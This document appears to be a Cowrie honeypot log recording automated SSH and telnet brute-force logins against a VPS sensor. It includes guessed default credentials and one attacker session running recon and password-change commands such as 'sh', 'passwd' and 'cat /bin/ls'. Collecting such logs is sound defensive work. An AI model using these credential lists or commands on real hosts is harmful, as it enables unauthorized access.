{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-24T19:05:08.116727Z","src_ip":"103.122.61.228","session":"82d9640dd8d3"}
{"eventid":"cowrie.session.closed","duration":0.8463466167449951,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:05:08.295637Z","src_ip":"103.122.61.228","session":"82d9640dd8d3"}
{"eventid":"cowrie.session.connect","src_ip":"103.122.61.228","src_port":39855,"dst_ip":"1.2.3.4","dst_port":23,"session":"8c8a12cdab4c","protocol":"telnet","message":"New connection: 103.122.61.228:39855 (1.2.3.4:23) [session: 8c8a12cdab4c]","sensor":"my-vps","timestamp":"2025-08-24T19:05:08.459800Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-24T19:05:09.181558Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T19:05:09.234222Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.input","input":"start","message":"CMD: start","sensor":"my-vps","timestamp":"2025-08-24T19:05:09.559127Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.failed","input":"start","message":"Command not found: start","sensor":"my-vps","timestamp":"2025-08-24T19:05:09.560069Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-24T19:05:09.929362Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.input","input":"config terminal","message":"CMD: config terminal","sensor":"my-vps","timestamp":"2025-08-24T19:05:10.279764Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.failed","input":"config terminal","message":"Command not found: config terminal","sensor":"my-vps","timestamp":"2025-08-24T19:05:10.280816Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-24T19:05:10.598585Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-24T19:05:10.599542Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.input","input":"linuxshell","message":"CMD: linuxshell","sensor":"my-vps","timestamp":"2025-08-24T19:05:10.919397Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.failed","input":"linuxshell","message":"Command not found: linuxshell","sensor":"my-vps","timestamp":"2025-08-24T19:05:10.920303Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-24T19:05:11.269305Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-24T19:05:11.270138Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-24T19:05:11.587692Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.input","input":"echo -e '\\x68\\x69\\x7A\\x70\\x71'","message":"CMD: echo -e '\\x68\\x69\\x7A\\x70\\x71'","sensor":"my-vps","timestamp":"2025-08-24T19:05:11.920804Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.input","input":"passwd","message":"CMD: passwd","sensor":"my-vps","timestamp":"2025-08-24T19:05:12.276637Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.success","realm":"passwd","input":"adminpass","message":"INPUT (passwd): adminpass","sensor":"my-vps","timestamp":"2025-08-24T19:05:12.661122Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.success","realm":"passwd","input":"adminpass","message":"INPUT (passwd): adminpass","sensor":"my-vps","timestamp":"2025-08-24T19:05:13.041082Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.input","input":"cd /tmp || cd /var || cd /dev || cd /etc","message":"CMD: cd /tmp || cd /var || cd /dev || cd /etc","sensor":"my-vps","timestamp":"2025-08-24T19:05:13.359256Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.input","input":"cat /bin/ls|more","message":"CMD: cat /bin/ls|more","sensor":"my-vps","timestamp":"2025-08-24T19:05:13.709444Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.failed","input":"cat /bin/ls | more","message":"Command not found: cat /bin/ls | more","sensor":"my-vps","timestamp":"2025-08-24T19:05:13.710556Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.command.input","input":"cat /bin/ls|head -n 1","message":"CMD: cat /bin/ls|head -n 1","sensor":"my-vps","timestamp":"2025-08-24T19:05:39.669201Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6d6e8bc5e89615bece1f943cff63e694ba7e6b16c1688a734134cbd37ffa8769","size":2318,"shasum":"6d6e8bc5e89615bece1f943cff63e694ba7e6b16c1688a734134cbd37ffa8769","duplicate":false,"duration":"30.6","message":"Closing TTY Log: var/lib/cowrie/tty/6d6e8bc5e89615bece1f943cff63e694ba7e6b16c1688a734134cbd37ffa8769 after 30.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:05:39.861232Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.session.closed","duration":31.405603647232056,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:05:39.865304Z","src_ip":"103.122.61.228","session":"8c8a12cdab4c"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":34458,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6641184954e","protocol":"ssh","message":"New connection: 92.118.39.71:34458 (1.2.3.4:22) [session: e6641184954e]","sensor":"my-vps","timestamp":"2025-08-24T19:06:17.374209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T19:06:17.375338Z","src_ip":"92.118.39.71","session":"e6641184954e"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T19:06:17.405060Z","src_ip":"92.118.39.71","session":"e6641184954e"}
{"eventid":"cowrie.login.failed","username":"solana","password":"Solana","message":"login attempt [solana/Solana] failed","sensor":"my-vps","timestamp":"2025-08-24T19:06:17.526783Z","src_ip":"92.118.39.71","session":"e6641184954e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:06:18.559860Z","src_ip":"92.118.39.71","session":"e6641184954e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52632,"dst_ip":"1.2.3.4","dst_port":22,"session":"01f5a78de900","protocol":"ssh","message":"New connection: 217.72.205.35:52632 (1.2.3.4:22) [session: 01f5a78de900]","sensor":"my-vps","timestamp":"2025-08-24T19:07:33.025763Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:07:33.026934Z","src_ip":"217.72.205.35","session":"01f5a78de900"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":53882,"dst_ip":"1.2.3.4","dst_port":22,"session":"42af4a74dbae","protocol":"ssh","message":"New connection: 45.88.8.215:53882 (1.2.3.4:22) [session: 42af4a74dbae]","sensor":"my-vps","timestamp":"2025-08-24T19:08:04.072628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T19:08:04.616623Z","src_ip":"45.88.8.215","session":"42af4a74dbae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T19:08:04.617304Z","src_ip":"45.88.8.215","session":"42af4a74dbae"}
{"eventid":"cowrie.login.success","username":"root","password":"Arhant@123","message":"login attempt [root/Arhant@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T19:08:06.349341Z","src_ip":"45.88.8.215","session":"42af4a74dbae"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:08:06.632085Z","src_ip":"45.88.8.215","session":"42af4a74dbae"}
{"eventid":"cowrie.session.connect","src_ip":"168.194.65.88","src_port":45870,"dst_ip":"1.2.3.4","dst_port":23,"session":"656e0fd81ba2","protocol":"telnet","message":"New connection: 168.194.65.88:45870 (1.2.3.4:23) [session: 656e0fd81ba2]","sensor":"my-vps","timestamp":"2025-08-24T19:12:02.410772Z"}
{"eventid":"cowrie.session.closed","duration":13.321046352386475,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:12:15.731709Z","src_ip":"168.194.65.88","session":"656e0fd81ba2"}
{"eventid":"cowrie.session.connect","src_ip":"59.2.90.116","src_port":34202,"dst_ip":"1.2.3.4","dst_port":23,"session":"fa09e09a2e20","protocol":"telnet","message":"New connection: 59.2.90.116:34202 (1.2.3.4:23) [session: fa09e09a2e20]","sensor":"my-vps","timestamp":"2025-08-24T19:12:37.034463Z"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":40208,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddf01ac0cbfe","protocol":"ssh","message":"New connection: 92.118.39.71:40208 (1.2.3.4:22) [session: ddf01ac0cbfe]","sensor":"my-vps","timestamp":"2025-08-24T19:12:51.336600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T19:12:51.337450Z","src_ip":"92.118.39.71","session":"ddf01ac0cbfe"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T19:12:51.367651Z","src_ip":"92.118.39.71","session":"ddf01ac0cbfe"}
{"eventid":"cowrie.login.failed","username":"solana","password":"12345678","message":"login attempt [solana/12345678] failed","sensor":"my-vps","timestamp":"2025-08-24T19:12:51.461214Z","src_ip":"92.118.39.71","session":"ddf01ac0cbfe"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:12:52.493286Z","src_ip":"92.118.39.71","session":"ddf01ac0cbfe"}
{"eventid":"cowrie.session.closed","duration":31.441588163375854,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:13:08.475983Z","src_ip":"59.2.90.116","session":"fa09e09a2e20"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50762,"dst_ip":"1.2.3.4","dst_port":22,"session":"812645be4ac7","protocol":"ssh","message":"New connection: 217.72.205.35:50762 (1.2.3.4:22) [session: 812645be4ac7]","sensor":"my-vps","timestamp":"2025-08-24T19:14:24.024678Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:14:24.025816Z","src_ip":"217.72.205.35","session":"812645be4ac7"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":42354,"dst_ip":"1.2.3.4","dst_port":22,"session":"488c4cd8b974","protocol":"ssh","message":"New connection: 45.88.8.186:42354 (1.2.3.4:22) [session: 488c4cd8b974]","sensor":"my-vps","timestamp":"2025-08-24T19:16:57.673791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T19:16:58.002140Z","src_ip":"45.88.8.186","session":"488c4cd8b974"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T19:16:58.003662Z","src_ip":"45.88.8.186","session":"488c4cd8b974"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123!","message":"login attempt [root/admin123!] succeeded","sensor":"my-vps","timestamp":"2025-08-24T19:16:59.288527Z","src_ip":"45.88.8.186","session":"488c4cd8b974"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:16:59.621456Z","src_ip":"45.88.8.186","session":"488c4cd8b974"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":45960,"dst_ip":"1.2.3.4","dst_port":22,"session":"67fe6ceab94e","protocol":"ssh","message":"New connection: 92.118.39.71:45960 (1.2.3.4:22) [session: 67fe6ceab94e]","sensor":"my-vps","timestamp":"2025-08-24T19:19:24.362461Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T19:19:24.363203Z","src_ip":"92.118.39.71","session":"67fe6ceab94e"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T19:19:24.393209Z","src_ip":"92.118.39.71","session":"67fe6ceab94e"}
{"eventid":"cowrie.login.failed","username":"sol","password":"1234","message":"login attempt [sol/1234] failed","sensor":"my-vps","timestamp":"2025-08-24T19:19:24.484714Z","src_ip":"92.118.39.71","session":"67fe6ceab94e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:19:25.517902Z","src_ip":"92.118.39.71","session":"67fe6ceab94e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63176,"dst_ip":"1.2.3.4","dst_port":22,"session":"0af438757516","protocol":"ssh","message":"New connection: 217.72.205.35:63176 (1.2.3.4:22) [session: 0af438757516]","sensor":"my-vps","timestamp":"2025-08-24T19:20:56.011701Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:20:56.013160Z","src_ip":"217.72.205.35","session":"0af438757516"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":51712,"dst_ip":"1.2.3.4","dst_port":22,"session":"137646341ff5","protocol":"ssh","message":"New connection: 92.118.39.71:51712 (1.2.3.4:22) [session: 137646341ff5]","sensor":"my-vps","timestamp":"2025-08-24T19:25:57.814317Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T19:25:57.815783Z","src_ip":"92.118.39.71","session":"137646341ff5"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T19:25:57.845943Z","src_ip":"92.118.39.71","session":"137646341ff5"}
{"eventid":"cowrie.login.failed","username":"sol","password":"1234567","message":"login attempt [sol/1234567] failed","sensor":"my-vps","timestamp":"2025-08-24T19:25:57.937791Z","src_ip":"92.118.39.71","session":"137646341ff5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:25:58.969795Z","src_ip":"92.118.39.71","session":"137646341ff5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62792,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b57d031c39a","protocol":"ssh","message":"New connection: 217.72.205.35:62792 (1.2.3.4:22) [session: 7b57d031c39a]","sensor":"my-vps","timestamp":"2025-08-24T19:27:48.143124Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:27:48.144358Z","src_ip":"217.72.205.35","session":"7b57d031c39a"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":59240,"dst_ip":"1.2.3.4","dst_port":23,"session":"8957e29d0800","protocol":"telnet","message":"New connection: 79.124.8.120:59240 (1.2.3.4:23) [session: 8957e29d0800]","sensor":"my-vps","timestamp":"2025-08-24T19:29:57.883843Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-24T19:29:57.923956Z","src_ip":"79.124.8.120","session":"8957e29d0800"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T19:29:57.939899Z","src_ip":"79.124.8.120","session":"8957e29d0800"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":57464,"dst_ip":"1.2.3.4","dst_port":22,"session":"0aadc02a8563","protocol":"ssh","message":"New connection: 92.118.39.71:57464 (1.2.3.4:22) [session: 0aadc02a8563]","sensor":"my-vps","timestamp":"2025-08-24T19:32:34.181770Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T19:32:34.183288Z","src_ip":"92.118.39.71","session":"0aadc02a8563"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T19:32:34.212393Z","src_ip":"92.118.39.71","session":"0aadc02a8563"}
{"eventid":"cowrie.login.failed","username":"sol","password":"123456","message":"login attempt [sol/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T19:32:34.334226Z","src_ip":"92.118.39.71","session":"0aadc02a8563"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:32:35.366903Z","src_ip":"92.118.39.71","session":"0aadc02a8563"}
